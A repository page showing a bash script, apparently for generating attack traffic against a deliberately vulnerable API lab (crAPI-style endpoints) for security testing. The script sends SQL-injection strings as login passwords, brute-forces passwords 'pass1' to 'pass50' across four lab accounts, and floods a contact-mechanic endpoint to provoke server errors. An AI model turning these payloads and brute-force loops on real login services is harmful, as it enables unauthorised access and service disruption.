test-org-12323423
/
devops
Watch 1
Star 0
Fork 0
Code Issues 0 Pull Requests 0 Releases 0 Wiki Activity
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
79 Commits
1 Branch
Tree: 0a20ea67d3
Branches Tags
${ item.name }
Create branch ${ searchTerm }
from '0a20ea67d3'
${ noResults }
devops/GSAutomation/scripts/attack_traffic.sh

attack_traffic.sh 5.7KB
Raw Blame History

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169 
  1. 

  2. #!/bin/bash

  3. 

  4. #Prompt the user to enter the value of HOSTNAME

  5. read -p "Enter the HOSTNAME: " HOSTNAME

  6. 

  7. 

  8. # Define the email addresses

  9. EMAILS=(

  10.     'apilab@akamai.com'

  11.     'apilab2@akamai.com'

  12.     'apilab3@akamai.com'

  13.     'apilab4@akamai.com'

  14. )

  15. 

  16. # Define the list of passwords

  17. PASSWORDS=(

  18.     '-'

  19.     ' '

  20.     '&'

  21.     '^'

  22.     '*'

  23.     ' or ''-'

  24.     ' or '' '

  25.     ' or ''&'

  26.     ' or ''^'

  27.     ' or ''*'

  28.     "-"

  29.     " "

  30.     "&"

  31.     "^"

  32.     "*"

  33.     " or ""-"

  34.     " or "" "

  35.     " or ""&"

  36.     " or ""^"

  37.     " or ""*"

  38.     'or true--'

  39.     "or true--"

  40.     'or true--'

  41.     ') or true--'

  42.     "') or true--"

  43.     "') or true--"

  44. )

  45. 

  46. # Define the common password

  47. COMMON_PASSWORD='cRaPi2023!!!'

  48. 

  49. echo "GENERATING REQUESTS FOR LOGIN ENDPOINT WITH SQL PAYLOAD"

  50. for email in "${EMAILS[@]}"; do

  51.     for password in "${PASSWORDS[@]}"; do

  52.         curl 'http://$HOSTNAME/identity/api/auth/login' \

  53.         -H 'Accept: */*' \

  54.         -H 'Accept-Language: en-CA,en-GB;q=0.9,en-US;q=0.8,en;q=0.7,de;q=0.6' \

  55.         -H 'Cache-Control: no-cache' \

  56.         -H 'Connection: keep-alive' \

  57.         -H 'Content-Type: application/json' \

  58.         -H 'DNT: 1' \

  59.         -H 'Origin: http://$HOSTNAME' \

  60.         -H 'Pragma: no-cache' \

  61.         -H 'Referer: http://$HOSTNAME/login' \

  62.         -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36' \

  63.         --data-raw $'{"email":"$email","password":"$password"}' \

  64.         --compressed \

  65.         --insecure \

  66.         -o /dev/null > /dev/null 2>&1

  67.     done

  68. done        

  69. echo "----------------COMPLETE---------------------------------"

  70. 

  71. echo "GENERATING REQUESTS FOR LOGIN ENDPOINT TO TRY DIFFERENT PASSWORDS FOR BRUTE FORCE AUTHENTICATION"

  72. # Define the password range

  73. for ((i=1; i<=50; i++)); do

  74.     PASSWORD="pass$i"

  75. 

  76.     for email in "${EMAILS[@]}"; do

  77.         curl "http://$HOSTNAME/identity/api/auth/login" \

  78.         -H "Accept: */*" \

  79.         -H "Accept-Language: en-CA,en-GB;q=0.9,en-US;q=0.8,en;q=0.7,de;q=0.6" \

  80.         -H "Cache-Control: no-cache" \

  81.         -H "Connection: keep-alive" \

  82.         -H "Content-Type: application/json" \

  83.         -H "DNT: 1" \

  84.         -H "Origin: http://$HOSTNAME" \

  85.         -H "Pragma: no-cache" \

  86.         -H "Referer: http://$HOSTNAME/login" \

  87.         -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" \

  88.         --data-raw "{\"email\":\"$email\",\"password\":\"$PASSWORD\"}" \

  89.         --compressed \

  90.         --insecure | jq -j

  91. 

  92.     done

  93. done 

  94. echo "----------------COMPLETE---------------------------------" 

  95. 

  96. 

  97. 

  98. # Function to obtain access token for a given email and password

  99. get_access_token() {

  100.     local email=$1

  101.     local password=$2

  102. 

  103.     # Use curl to get the access token and jq to extract it

  104.     local access_token=$(curl "http://$HOSTNAME/identity/api/auth/login" \

  105.         -H 'Content-Type: application/json' \

  106.         --data-raw '{"email":"'"$email"'","password":"'"$password"'"}' \

  107.         --insecure -s | jq -j .token)

  108. 

  109.     echo "$access_token"

  110. }

  111. 

  112. # Define the common password

  113. COMMON_PASSWORD='cRaPi2023!!!'

  114. 

  115. # Define the email addresses

  116. emails=(

  117.     'apilab@akamai.com'

  118.     'apilab2@akamai.com'

  119.     'apilab3@akamai.com'

  120.     'apilab4@akamai.com'

  121. )

  122. 

  123. echo "GENERATIC REQUESTS FOR CONTACT MECHANIIC ENDPOINT FOR 5XX SERVER ERRORS"

  124. for ((x=1; x<=20; x++)); do

  125.     for ((i=0; i<${#emails[@]}; i++)); do

  126.         # Generate access token

  127.         ACCESS_TOKEN=$(get_access_token "${emails[i]}" "$COMMON_PASSWORD")

  128.         # Define VINs

  129.         VINS=("8WNFQ29UASO325881" "2QJHA06QPTA452548" "9MZWD50MITK534430" "2QBSC54ZIHY224823")

  130.         VIN=${VINS[i]}

  131. 

  132.         # Execute first curl command

  133.             curl "http://$HOSTNAME/workshop/api/merchant/contact_mechanic" \

  134.             -H "Accept: */*" \

  135.             -H "Accept-Language: en-CA,en-GB;q=0.9,en-US;q=0.8,en;q=0.7,de;q=0.6" \

  136.             -H "Authorization: Bearer $ACCESS_TOKEN" \

  137.             -H "Cache-Control: no-cache" \

  138.             -H "Connection: keep-alive" \

  139.             -H "Content-Type: application/json" \

  140.             -H "DNT: 1" \

  141.             -H "Origin: http://$HOSTNAME" \

  142.             -H "Pragma: no-cache" \

  143.             -H "Referer: http://$HOSTNAME/contact-mechanic?VIN=$VIN" \

  144.             -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" \

  145.             --data-raw "{\"mechanic_code\":\"T567\",\"problem_details\":\"123\",\"vin\":\"$VIN\",\"mechanic_api\":\"http://$HOSTNAME/workshop/api/mechanic/receive_report\",\"repeat_request_if_failed\":false,\"number_of_repeats\":1}" \

  146.             --compressed \

  147.             --insecure \

  148.             -o /dev/null > /dev/null 2>&1

  149. 

  150. 

  151.             # Execute second curl command

  152.             curl "http://$HOSTNAME/workshop/api/merchant/contact_mechanic" \

  153.             -H "Accept: */*" \

  154.             -H "Accept-Language: en-CA,en-GB;q=0.9,en-US;q=0.8,en;q=0.7,de;q=0.6" \

  155.             -H "Authorization: Bearer $ACCESS_TOKEN" \

  156.             -H "Cache-Control: no-cache" \

  157.             -H "Connection: keep-alive" \

  158.             -H "Content-Type: application/json" \

  159.             -H "DNT: 1" \

  160.             -H "Origin: http://$HOSTNAME" \

  161.             -H "Pragma: no-cache" \

  162.             -H "Referer: http://$HOSTNAME/contact-mechanic?VIN=$VIN" \

  163.             -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" \

  164.             --data-raw "{\"mechanic_code\":\"123\",\"problem_details\":\"123\",\"vin\":\"$VIN\",\"mechanic_api\":\"http://$HOSTNAME/workshop/api/mechanic/receive_report\",\"repeat_request_if_failed\":false,\"number_of_repeats\":1}" \

  165.             --compressed \

  166.             --insecure \

  167.             -o /dev/null > /dev/null 2>&1

  168.     done

  169. done